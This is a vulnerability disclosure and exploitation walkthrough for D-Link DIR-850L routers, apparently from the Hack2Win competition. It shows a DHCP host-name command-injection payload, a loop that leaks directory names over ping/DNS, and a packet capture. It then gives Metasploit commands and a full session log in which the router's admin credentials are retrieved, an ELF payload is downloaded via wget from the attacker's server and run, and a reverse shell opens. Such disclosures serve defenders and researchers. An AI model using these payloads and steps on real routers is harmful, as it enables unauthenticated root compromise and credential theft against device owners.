Dlink DIR-850L UnAuthenticated OS Command Execution

Dlink DIR-850L UnAuthenticated OS Command Execution

The vulnerabilities have been reported as part of Hack2Win competition, for more information about Hack2Win – Hack2Win – https://blogs.securiteam.com/index.php/archives/3310.

The vulnerabilities found in D-Link 850L are:

  • Remote Command Execution via WAN and LAN
  • Remote Unauthenticated Information Disclosure via WAN and LAN
  • Unauthorized Remote Code Execution as root via LAN

Dlink DIR-850L UnAuthenticated OS Command Execution as root via LAN

The D-Link 850L runs dnsmasq daemon as root. The daemon execute the “host-name” parameter from the DHCP server.

Affected version

DIR-850L routers with firmware up to 1.14B07

Proof of Concept

In order to exploit this vulnerability, we need to be on the same LAN with the victim and to set a DHCP server in our control.

In this Proof of Concept we will use a Kali machine.

The attacker need to edit the /etc/dhcp/dhclient.conf file and change the host-name field to the command we want to execute.

The following DHCP request will execute ping command on the router:

send host-name = “;ping 192.168.0.100”;

In order to see the results you need to sniff the network and inspect the packets

Using DNS to exfiltrate information:

send host-name = “;for i in `ls /`; do ping $i;done”;

If we will sniff the network we will see the following:

17:41:42.963917 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36

17:41:44.955685 IP 192.168.1.100.37895 > 192.168.1.1.53: 2+ AAAA? www. (21)
17:41:44.955754 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.956251 IP 192.168.1.100.51733 > 192.168.1.1.53: 3+ AAAA? www. (21)
17:41:44.956282 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.956797 IP 192.168.1.100.52958 > 192.168.1.1.53: 4+ AAAA? www. (21)
17:41:44.956821 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.957639 IP 192.168.1.100.49007 > 192.168.1.1.53: 5+ A? www. (21)
17:41:44.957660 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.958327 IP 192.168.1.100.42641 > 192.168.1.1.53: 6+ A? www. (21)
17:41:44.958351 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.958837 IP 192.168.1.100.36077 > 192.168.1.1.53: 7+ A? www. (21)
17:41:44.958857 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.965678 IP 192.168.1.100.49884 > 192.168.1.1.53: 2+ AAAA? var. (21)
17:41:44.965704 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.969792 IP 192.168.1.100.53144 > 192.168.1.1.53: 3+ AAAA? var. (21)
17:41:44.969820 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.970305 IP 192.168.1.100.32949 > 192.168.1.1.53: 4+ AAAA? var. (21)
17:41:44.970326 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.970971 IP 192.168.1.100.48094 > 192.168.1.1.53: 5+ A? var. (21)
17:41:44.970993 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.971505 IP 192.168.1.100.52246 > 192.168.1.1.53: 6+ A? var. (21)
17:41:44.971516 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.972015 IP 192.168.1.100.41323 > 192.168.1.1.53: 7+ A? var. (21)
17:41:44.972036 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.974624 IP 192.168.1.100.50795 > 192.168.1.1.53: 2+ AAAA? usr. (21)
17:41:44.974653 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.975316 IP 192.168.1.100.38359 > 192.168.1.1.53: 3+ AAAA? usr. (21)
17:41:44.975337 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.975827 IP 192.168.1.100.55240 > 192.168.1.1.53: 4+ AAAA? usr. (21)
17:41:44.975848 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.976660 IP 192.168.1.100.44499 > 192.168.1.1.53: 5+ A? usr. (21)
17:41:44.976668 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.979721 IP 192.168.1.100.57446 > 192.168.1.1.53: 6+ A? usr. (21)
17:41:44.979748 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.980401 IP 192.168.1.100.35172 > 192.168.1.1.53: 7+ A? usr. (21)
17:41:44.980422 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.983041 IP 192.168.1.100.60090 > 192.168.1.1.53: 2+ AAAA? tmp. (21)

You can exploit Dlink DIR-850L UnAuthenticated OS Command Execution vulnerability using Metasploit.

  1. Download dlink_850l_unauth_exec module and move it to /usr/share/metasploit-framework/modules/exploits/linux/http/ directory
  2. Start msfconsole
    use exploit/linux/http/dlink_dir850l_unauth_exec.rb
    set RHOST [RouterIP]
    set PAYLOAD linux/mipsbe/shell/reverse_tcp
    run
  3. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
    msf > use exploit/linux/http/dlink_dir850l_unauth_exec
    
    msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
    RHOST => 192.168.0.14
    msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
    RPORT => 80
    msf exploit(dlink_dir850l_unauth_exec) > check
    [*] 192.168.0.14:80 The target service is running, but could not be validated.
    msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
    VERBOSE => true
    msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
    LHOST => ens3
    msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
    LPORT => 3131
    msf exploit(dlink_dir850l_unauth_exec) > run

    [*] Started reverse TCP handler on 192.168.0.11:3131
    [*] 192.168.0.14:80 - Connecting to target...
    [+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
    [+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
    [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
    [*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
    [*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
    [*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
    [*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
    [*] 192.168.0.14:80 - Sending payload to the server...
    [*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
    [*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
    [*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
    [*] Sending stage (84 bytes) to 192.168.0.14
    [*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
    [+] Deleted /tmp/uoskutcy
    [-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
    [*] Server stopped.
    [*] Exploit completed, but no session was created.
    msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
    [*] Starting interaction with 1...

    190745749
    wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
    true
    pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
    OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
    iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
    pwd
    /

Reference: